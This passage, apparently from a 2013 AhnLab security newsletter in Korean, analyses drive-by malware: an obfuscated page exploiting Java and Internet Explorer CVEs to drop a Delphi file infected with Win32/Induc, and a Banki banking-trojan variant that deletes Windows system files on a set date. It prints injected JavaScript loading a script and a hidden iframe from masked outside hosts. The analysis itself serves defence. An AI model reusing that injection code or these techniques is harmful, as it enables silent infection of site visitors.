는 Java와 인터넷 익스플로러(IE)에 존재하는 취약점을 이용해 실행
파일을 다운로드함을 알 수 있다.
[그림 5] 공다팩(Gongda Pack)으로 난독화된 index.html
[그림 8] qq.exe에 의해서 다운로드되는 2.mp3
[그림 6] 난독화가 해제된 index.html
qq.exe에 의해서 다운로드되는 2.mp3파일도 마찬가지로 아래 그림
과 같이 Win32/Induc 바이러스가 존재했다.
이를 근거로 판단해 볼 때 악성코드 제작자는 악성코드 제작 시 인
터넷에 공개된 Win32/Induc가 포함된 Delphi소스를 사용한 것으로
추정된다.
해당 악성코드는 V3 제품을 통해 진단 및 치료가 가능하다.
[그림 7] Win32/Induc 바이러스 코드가 포함된 qq.exe
if(document.cookie.indexOf('ggads')==-1){var expires=new
Date();expires.setTime(expires.getTime()+24*60*60*1000
);document.cookie='ggads=Yes;path=/;expires='+expires.
toGMTString();document.write(unescape("<script src=http://
ucc.******.co.kr/adsi/cp.js></script>"));}
document.write("<iframe src=http://flash.*****.pe.kr/adsi/adsi.
htmlwidth=0 height=0></iframe>");
[그림 6]과 같이 qq.exe를 다운로드 및 실행하기 위해서 사용한 취약
점은 Java 5개(CVE-2010-0886, CVE-2011-3544, CVE-2012-0507,
CVE-2012-4681, CVE-2012-5076), IE 1개(CVE-2012-1889) 등 총 6
개였다.
위 취약점을 이용해 다운로드되는 qq.exe의 내부 코드를 살펴보면
Delphi로 제작됐으며, 아래 그림처럼 Win32/Induc 바이러스 코드
가 존재함을 확인할 수 있다.
00003604 00403604 0 SOFTWARE\Borland\Delphi\RTL
00005568 00405568 0 Software\Borland\Locales
00005584 00405584 0 Software\Borland\Delphi\Locales
■특정 날짜 되면 시스템 파괴하는 Banki
국내 인터넷 뱅킹 사용자를 타깃으로 한 악성코드(Banki)에서 특정 시
스템 날짜가 되면 윈도우 시스템 파일을 삭제하는 기능이 추가로 발견
됐다.
이번에 발견된 Banki 변종은 Induc 바이러스에 감염된 악성코드로,
http://210.***.**.32:2323/qq.exe를 통해 유포되는 것으로 확인됐다.
위 파일이 실행돼 악성코드에 감염될 경우 아래의 경로에 파일이 생성
된다.
C:\Windows\system32\muis\tempblogs.\tempblogs..\‘1216’,
‘Winlogones.exe’, ‘csrsses.exe’
25
[그림 9] 악성코드 감염으로 생성된 파일
[그림 11] 시스템 파괴 기능 동작
[그림 12] 시스템 파괴 후 재부팅 시 화면
[그림 10] 정상적인 프로세스만 동작하는 것으로 위장
감염된 뒤에는 레지스트리에 서비스로 등록돼 부팅 시 실행된
다. 실행된 환경에 따라 다르게 나타날 수 있지만, 악성 프로세스
‘winlogones.exe’는 정상 프로세스인 ‘winlogon.exe’에 자신을 인젝
션하여 프로세스 목록에 ‘winlogones.exe’가 보이지 않게 한다. 동시
에 또 다른 악성 프로세스인 ‘csrsses.exe’도 계산기 프로세스 이름인
‘calc.exe’에 자신을 인젝션하여 실행한다.
만약 시스템을 재부팅하면 아래와 같은 메시지가 나타나며, 정상적인
부팅이 불가능하다.
해당 악성코드는 V3 제품을 통해 진단 및 치료가 가능하다.
이 밖에 자세한 내용은 안랩 홈페이지(www.ahnlab.com)의 ASEC 리
포트에서 확인할 수 있다.
또한 악성코드는 ‘winlogones.exe’가 존재하지 않을 경우, www.
mi****.com/temp/q/m.mp3로 접속하여 다시 다운로드하게 돼
있다. 이후 프로세스 목록을 확인해 ‘V3LSvc.exe’, ‘AYRTSrv.aye’,
‘Nsavsvc.npc’ 가 없을 경우 추가로 파일을 다운 받는다.
다운로드 받은 파일은 아래의 경로에 생성된다.
이번 변종의 가장 큰 특징은 특정 날짜(2013년 1월 16일)가 되
면 시스템 파괴 기능이 작동하도록 제작돼 있다는 점이다. 해당 날
짜가 되면 배치 파일을 c:\에 생성하며 실행된다. 배치 파일에 의해
ALG(Application Layer Gate) 서비스를 중지하고 hal.dll 파일과
System32 내의 파일을 삭제하는 것이다. 배치 파일이 실행되면 아래
와 같은 메시지가 나타난다.
C:\Windows\system32\muis\tempblogs.\tempblogs..\
26
발행인 : 김홍선
발행처 : 주식회사 안랩
경기도 성남시 분당구 삼평동 673
T. 031-722-8000 F. 031-722-8901
편집인 : 안랩 세일즈마케팅팀
디자인 : 안랩 UX디자인팀
Copyright(c) AhnLab,Inc. 2013 All Rights Reserved.
본 간행물의 어떤 부분도 안랩의 서면 동의 없이 복제, 복사, 검색 시스템
으로 저장 또는 전송될 수 없습니다. 안랩, 안랩 로고는 안랩의 등록상표입
니다. 그 외 다른 제품 또는 회사 이름은 해당 소유자의 상표 또는 등록상
표일 수 있습니다. 본 문서에 수록된 정보는 고지없이 변경될 수 있습니다.
경기도 성남시 분당구 삼평동 673
T. 031-722-8000 F. 031-722-8901
Copyright (c) AhnLab, Inc. 2013 All rights reserved.
http://www.ahnlab.com
http://blog.ahnlab.com
http://twitter.com/ahnlab_man